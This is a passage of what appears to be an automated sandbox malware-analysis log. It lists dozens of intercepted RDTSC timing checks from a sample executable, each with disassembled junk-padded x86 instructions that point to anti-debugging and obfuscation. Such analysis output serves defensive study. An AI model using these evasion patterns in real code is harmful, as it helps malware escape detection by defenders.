Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1742328 second address: 174236D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEA75199F73h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 jg 00007FEA75199F68h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pop eax 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jl 00007FEA75199F66h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1747969 second address: 1747973 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1747501 second address: 1747523 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jmp 00007FEA75199F6Ah 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174CE13 second address: 174CE1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174CE1B second address: 174CE2F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEA75199F66h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174CE2F second address: 174CE49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174CE49 second address: 174CE6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75199F76h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174D389 second address: 174D38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174D4C6 second address: 174D4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174D4CF second address: 174D4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174D4D5 second address: 174D4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174D4D9 second address: 174D4F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FEA75194B55h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174D8DC second address: 174D8F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174DD43 second address: 174DD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 jmp 00007FEA75194B4Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174DD58 second address: 174DD6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174DD6C second address: 174DD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174DD70 second address: 174DD74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174DD74 second address: 174DD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FEA75194B4Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174DD91 second address: 174DD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174E1A7 second address: 174E1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B4Fh 0x00000009 popad 0x0000000a jo 00007FEA75194B4Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174E1C3 second address: 174E1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 jmp 00007FEA75199F72h 0x0000000c jmp 00007FEA75199F79h 0x00000011 pop ecx 0x00000012 popad 0x00000013 push edi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174E1FB second address: 174E210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B4Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174CA7E second address: 174CA82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 174CA82 second address: 174CA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1752E70 second address: 1752EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FEA75199F77h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 jmp 00007FEA75199F6Ch 0x0000001a push edi 0x0000001b pop edi 0x0000001c pop ebx 0x0000001d jmp 00007FEA75199F6Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175333C second address: 1753354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 jmp 00007FEA75194B4Ch 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1753354 second address: 175335A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175335A second address: 175337F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B59h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175337F second address: 1753383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1753639 second address: 175363D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175363D second address: 1753641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1753641 second address: 1753660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B59h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1753C13 second address: 1753C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007FEA75199F66h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FEA75199F71h 0x00000016 jnp 00007FEA75199F66h 0x0000001c jne 00007FEA75199F66h 0x00000022 popad 0x00000023 pop edx 0x00000024 pop eax 0x00000025 jl 00007FEA75199F8Bh 0x0000002b jmp 00007FEA75199F73h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FEA75199F6Ah 0x00000037 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1756C8E second address: 1756C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1756C92 second address: 1756CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007FEA75199F7Fh 0x0000000f jmp 00007FEA75199F79h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1756CBE second address: 1756CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1756CC2 second address: 1756CC8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16D2334 second address: 16D236C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEA75194B5Eh 0x00000008 jmp 00007FEA75194B58h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA75194B56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16D236C second address: 16D238D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA75199F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FEA75199F71h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16D238D second address: 16D2395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16DAA0D second address: 16DAA19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FEA75199F66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16DAA19 second address: 16DAA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16DAA1D second address: 16DAA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16DAA21 second address: 16DAA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FEA75194B50h 0x00000011 jmp 00007FEA75194B55h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16DAA54 second address: 16DAA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175A23B second address: 175A254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B54h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721155 second address: 1721159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721159 second address: 16FB908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 xor cx, 49B8h 0x0000000e call dword ptr [ebp+1244A2ECh] 0x00000014 pushad 0x00000015 jno 00007FEA75194B6Eh 0x0000001b jmp 00007FEA75194B54h 0x00000020 jns 00007FEA75194B52h 0x00000026 jmp 00007FEA75194B54h 0x0000002b popad 0x0000002c je 00007FEA75194B5Ch 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 jg 00007FEA75194B46h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17216D7 second address: 1721765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FEA75199F75h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 pop eax 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jnl 00007FEA75199F74h 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 jmp 00007FEA75199F75h 0x00000027 jg 00007FEA75199F6Ch 0x0000002d popad 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jmp 00007FEA75199F76h 0x0000003a ja 00007FEA75199F66h 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721765 second address: 172176B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721846 second address: 172184C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172184C second address: 1721865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 js 00007FEA75194B46h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jg 00007FEA75194B67h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721865 second address: 1721869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17218BC second address: 17218C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17218C0 second address: 17218C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17218C4 second address: 1721908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], esi 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FEA75194B48h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push ecx 0x00000025 mov dword ptr [ebp+1244635Ch], ebx 0x0000002b pop edi 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jno 00007FEA75194B4Ch 0x00000035 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721908 second address: 1721912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1721C5C second address: 1721C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEA75194B46h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jbe 00007FEA75194B4Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1722087 second address: 172208B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 172208B second address: 17220A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17220A7 second address: 17220B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17223DA second address: 1722429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ecx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 jns 00007FEA75194B46h 0x00000017 popad 0x00000018 pop ecx 0x00000019 mov eax, dword ptr [eax] 0x0000001b jg 00007FEA75194B58h 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FEA75194B51h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1722503 second address: 1722513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1722513 second address: 1722572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FEA75194B4Eh 0x0000000f jc 00007FEA75194B48h 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FEA75194B48h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov dh, DDh 0x00000032 mov edx, ecx 0x00000034 lea eax, dword ptr [ebp+12482EE7h] 0x0000003a mov edx, dword ptr [ebp+122D3831h] 0x00000040 nop 0x00000041 je 00007FEA75194B4Eh 0x00000047 jp 00007FEA75194B48h 0x0000004d push ebx 0x0000004e pop ebx 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push edi 0x00000054 pop edi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1722572 second address: 16FC43E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FEA75199F74h 0x0000000f pop ebx 0x00000010 popad 0x00000011 nop 0x00000012 call dword ptr [ebp+122D29DCh] 0x00000018 push edx 0x00000019 pushad 0x0000001a je 00007FEA75199F66h 0x00000020 jno 00007FEA75199F66h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175A7DA second address: 175A7E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jp 00007FEA75194B46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175A8FE second address: 175A906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175A906 second address: 175A91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEA75194B46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FEA75194B46h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175A91B second address: 175A924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175A924 second address: 175A92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 175E90A second address: 175E922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75199F6Fh 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1762082 second address: 17620BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEA75194B46h 0x0000000a jng 00007FEA75194B46h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FEA75194B59h 0x00000017 jmp 00007FEA75194B4Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17620BC second address: 17620C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17648D2 second address: 17648E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FEA75194B46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1768EF8 second address: 1768F23 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEA75199F7Dh 0x00000008 jmp 00007FEA75199F75h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEA75199F6Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1769066 second address: 1769093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FEA75194B63h 0x00000010 jmp 00007FEA75194B4Ah 0x00000015 jmp 00007FEA75194B53h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17691EF second address: 17691F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17691F5 second address: 1769201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1769201 second address: 1769215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1769215 second address: 1769231 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FEA75194B52h 0x00000010 rdtsc
